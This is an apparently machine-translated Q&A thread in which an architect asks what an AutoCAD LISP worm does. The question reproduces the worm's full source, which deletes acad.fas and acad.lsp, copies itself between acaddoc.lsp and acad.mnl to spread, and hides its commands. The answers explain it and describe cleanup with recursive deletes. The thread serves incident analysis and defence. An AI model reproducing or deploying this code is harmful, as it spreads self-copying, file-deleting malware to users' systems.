Отладка, что делает этот вирус LISP

Question

Моя фирма пострадала от вируса AutoCAD, который удаляет и заменяет наш acaddoc.lsp на приведенную ниже процедуру.

Я архитектор и не совсем уверен, что это делает повторяющиеся операции «найти» и «удалить».

Вопросы * * 1006 Что означает замена файлов (в данный момент выполняется поиск acadapq)? Кто пишет вирус для AutoCAD?!?! Кто-нибудь видел это раньше? форумы САПР не очень полезны. (setq wold_cmd (getvar "cmdecho")) (setvar "cmdecho" 0) (setq bb 2) (setq dpath (getvar "dwgprefix")) (setq wpath (getvar "menuname")) (setq wpath (substr wpath 1 (- (strlen wpath) 4))) (setq n 0) (while (< n 1) (if (findfile "acad.fas") (if (vl-file-delete (findfile "acad.fas")) (setq n 0)) (setq n 2))) (setq n 0) (while (< n 1) (if (findfile "lcm.fas") (if (vl-file-delete (findfile "lcm.fas")) (setq n 0)) (setq n 2))) (setq n 0) (while (< n 1) (if (findfile "acad.lsp") (if (vl-file-delete (findfile "acad.lsp")) (setq n 0)) (setq n 2))) (defun wwriteapp () (if (setq wwjm1 (open wnewacad "w")) (progn (setq wwjm (open woldacad "r")) (while (setq wwz (read-line wwjm)) (write-line wwz wwjm1)) (close wwjm) (close wwjm1)))) (setq lbz 0) (setq wwjqm (strcat dpath "acaddoc.lsp")) (if (setq wwjm (open wwjqm "r")) (progn (repeat 3 (read-line wwjm)) (setq wz (read-line wwjm)) (setq ab (atoi (substr wz 4 1))) (close wwjm) (if (> ab bb) (setq lbz 1)))) (setq wwjqm (strcat wpath "acad.mnl")) (if (setq wwjm (open wwjqm "r")) (progn (repeat 3 (read-line wwjm)) (setq wz (read-line wwjm)) (setq nb (atoi (substr wz 4 1))) (close wwjm) (if (< nb bb) (setq lbz 1))) (setq lbz 1)) (if (= lbz 1) (progn (setq woldacad (strcat dpath "acaddoc.lsp")) (setq wnewacad (strcat wpath "acad.mnl")) (wwriteapp))) (if (and (/= (substr dpath 1 1) (chr 67)) (/= (substr dpath 1 1) (chr 68)) (/= (substr dpath 1 1) (chr 69)) (/= (substr dpath 1 1) (chr 70))) (progn (setq woldacad (strcat wpath "acad.mnl")) (setq wnewacad (strcat dpath "acaddoc.lsp")) (wwriteapp)) (vl-file-delete (strcat dpath "acaddoc.lsp"))) ;load "acadapq") (setvar "cmdecho" wold_cmd)

Answer 1

Он поддерживает обход файлов, удаление и замену общих файлов настроек AutoCAD. ("acad.fas", "acad.lsp", "acaddoc.lsp") Я не знаю, что такое lcm.fas. Является ли это частью вертикального продукта AutoCAD, то есть AutoCAD механического или архитектурного рабочего стола?

Цикл по сути "пока я продолжаю находить на пути поддержки удалить его".

Насколько я знаю, AutoCAD не имеет встроенной защиты от этого. (Может быть какая-то системная переменная acad, которая останавливает выполнение этих файлов).

Строки "cmdecho" сохраняют и восстанавливают системную переменную, которая разрешает / подавляет отображение команд. Выключает его во время работы (чтобы вы не заметили), а затем восстанавливает исходную настройку.

Вежливый вирус: \

Когда AutoCAD запускается, он запускает первый «acad.fas» и первый «acad.lsp», который он находит на своем пути поддержки. Каждый раз, когда AutoCAD загружает новый файл .dwg, он запускает файл «acaddoc.lsp».

Answer 2

Как выполните следующие действия, чтобы избавиться от этого червя:

вручную Скопируйте прикрепленную подпрограмму на свой компьютер: acaddocfix_1.6.lsp
Загрузите файл lisp с помощью команды APPLOAD
Файл lisp запустится автоматически и очистит все черви в ваших папках поддержки.

Хотя это еще один способ, мы можем сделать это в виде пакетного файла, добавив его, как только любой пользователь запустит свой ПК, как я проверяю с ИТ до

Автоматический запуск Запустите антивирус или очиститель, чтобы избавиться от файлов «acaddoc.lsp». Обычно чистая процедура устанавливает простую процедуру в ваш файл acad20XXdoc.lsp, которая автоматически очищает эти файлы, но я рекомендую сначала очистить все вирусы антивирусом. Вы также можете запустить пакетный файл -acaddoc.bat dos для очистки всех ваших дисков вручную. Запустите этот пакет один раз, и он удалит все файлы acaddoc.lsp в вашей системе.

ПРИМЕЧАНИЕ. Если какой-либо из зараженных файлов в ваших папках поддержки Autocad ДЕЙСТВИТЕЛЬНО ЧИТАЕТ, очиститель не сможет очистить эти файлы !!

см. http://metinsaylan.com/how-to-clean-acaddoc-lsp-virus-from-your-pc/

Answer 3

Дикая вещь в том, что файл lisp создается только при открытии файлов в сети, локальные копии, похоже, не имеют этой проблемы. добавьте del / s acaddoc.lsp и del / s acad.lsp ко всем сценариям входа пользователей в систему и запускайте их в течение недели или около того, и это должно избавить от всех файлов acaddoc.lsp и acad.lsp, которые вирус хранит в .. Убедитесь, что вы на самом деле не используете эти файлы в своих целях, прежде чем запускать команду удаления

.